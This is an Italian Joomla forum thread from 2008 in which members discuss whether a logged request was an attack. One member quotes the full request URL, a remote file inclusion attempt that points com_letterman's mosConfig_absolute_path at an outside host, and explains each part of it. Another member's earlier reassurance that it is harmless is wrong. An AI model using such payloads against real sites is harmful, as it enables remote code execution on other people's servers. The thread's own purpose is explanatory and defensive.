Back to top

Autore Topic: Tentativo di hackeraggio?  (Letto 5164 volte)

Offline JoomLena

  • Esploratore
  • **
  • Post: 98
  • Sesso: Maschio
    • Mostra profilo

Offline = odino =

  • Instancabile
  • ******
  • Post: 5696
  • Sesso: Maschio
  • "In realtà li trasforma in menomati" Danzel
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #1 il: 16 Set 2008, 16:57:29 »
 ;D  diciamo che non cercava un URL specifica del tuo sito  ;D

Offline JoomLena

  • Esploratore
  • **
  • Post: 98
  • Sesso: Maschio
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #2 il: 16 Set 2008, 17:04:39 »
che vuoldire?
 >:( >:( >:( >:(

Offline ventus85

  • Instancabile
  • ******
  • Post: 6538
  • Sesso: Femmina
  • Affetta da Joomlaite
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #3 il: 16 Set 2008, 17:20:23 »
Ti spiego con un esempio:
hai il componente X che fa Y. Tra le configurazioni di questo componente te imposti che sia visibile solo agli iscritti al sito.
Allora se il visitatore (non iscritto) Pippo clicca sul link di quel componente compare quella scritta.

Caso semplice: un forum. Nel menù principale hai il link "forum" e nelle impostazioni del forum c'è scritto che è visibile solo agli iscritti. In tal caso ti viene la scritta "Questo forum è aperto solo agli utenti registrati e loggati.
Se sei già registrato, per favore loggati. ".

E' la stessa cosa che è successo a te.

Stessa cosa succede se un utente clicca sul link di un contenuto statico che però te hai sospeso (non più pubblicato).

Tranquillo, non c'è nessun attacco.

Causa di questo può essere un contenuto non più pubblicato o diritti non concessi a tutti gli utenti.
« Ultima modifica: 16 Set 2008, 17:22:19 da ventus85 »
Se volete aiuto non mandate messaggi privati, ma usate la funzione Cerca e postate sul forum, grazie!

Born in the wind, born to be wild!

Offline = odino =

  • Instancabile
  • ******
  • Post: 5696
  • Sesso: Maschio
  • "In realtà li trasforma in menomati" Danzel
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #4 il: 16 Set 2008, 19:20:47 »
Ventus, sei sicura?

Offline ventus85

  • Instancabile
  • ******
  • Post: 6538
  • Sesso: Femmina
  • Affetta da Joomlaite
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #5 il: 16 Set 2008, 19:34:10 »
Ventus, sei sicura?

In che senso?


Il mio era un esempio per fargli capire che messaggi come quello non sono di potenziali attacchi ma soltanto "chiamate" ad url che in verità "non hanno destinazione".
Se volete aiuto non mandate messaggi privati, ma usate la funzione Cerca e postate sul forum, grazie!

Born in the wind, born to be wild!

Offline JoomLena

  • Esploratore
  • **
  • Post: 98
  • Sesso: Maschio
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #6 il: 16 Set 2008, 20:11:19 »
ok azie mille spero di poter stare tranquillo....  ;D ;D ;D ;D

Offline = odino =

  • Instancabile
  • ******
  • Post: 5696
  • Sesso: Maschio
  • "In realtà li trasforma in menomati" Danzel
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #7 il: 17 Set 2008, 08:29:05 »
Ventus, sei sicura?

In che senso?


Il mio era un esempio per fargli capire che messaggi come quello non sono di potenziali attacchi ma soltanto "chiamate" ad url che in verità "non hanno destinazione".

nel senso che guardando qua la situazione si schiarisce, chi ha digitato quell'URL non l'ha fatto di certo in maniera benevola

Offline ventus85

  • Instancabile
  • ******
  • Post: 6538
  • Sesso: Femmina
  • Affetta da Joomlaite
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #8 il: 17 Set 2008, 10:40:56 »
 :o :o

Grazie per l'utile informazione.
Se volete aiuto non mandate messaggi privati, ma usate la funzione Cerca e postate sul forum, grazie!

Born in the wind, born to be wild!

Offline = odino =

  • Instancabile
  • ******
  • Post: 5696
  • Sesso: Maschio
  • "In realtà li trasforma in menomati" Danzel
    • Mostra profilo
Re: Tentativo di hackeraggio?
« Risposta #9 il: 17 Set 2008, 11:38:45 »
:o :o

Grazie per l'utile informazione.

Ti avviso che la segnalazione della vurnerabilità l'ho trovata stamattina.

Però andando a rigor di logica:

Codice: [Seleziona]
http://www.feudolampiasi.it/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ezy-hosts.com/pages/posting???
*** lo traduciamo con ***

Sul dominio

Codice: [Seleziona]
http://www.feudolampiasi.it/index.php
attraverso il componente letterman

Codice: [Seleziona]
?option=com_letterman&task=view&Itemid=&
imposta la root / path del sito:

Codice: [Seleziona]
mosConfig_absolute_path

come segue:

Codice: [Seleziona]
http://www.ezy-hosts.com/pages/posting???
***
---
***

Sottolineo che quella vulnerabilità non dovrebbe creare più problemi ora, affliggeva vecchie verisoni di Joomla! a quanto ho capito ( grazie al com_letterman).

 



Web Design Bolzano Kreatif